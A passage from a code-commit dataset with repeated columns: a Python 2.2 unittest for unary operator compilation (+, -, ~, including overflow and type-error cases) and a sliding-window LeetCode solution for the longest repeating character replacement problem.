def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
<commit_before><commit_msg>Test the unary operator changes to the compiler<commit_after>
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
Test the unary operator changes to the compiler"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
<commit_before><commit_msg>Test the unary operator changes to the compiler<commit_after>"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
|
198b9972c4fd89f95660dd2cf71a6eb983dae76a
|
py/longest-repeating-character-replacement.py
|
py/longest-repeating-character-replacement.py
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
Add py solution for 424. Longest Repeating Character Replacement
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/
|
Python
|
apache-2.0
|
ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
<commit_before><commit_msg>Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/<commit_after>
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
<commit_before><commit_msg>Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/<commit_after>from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.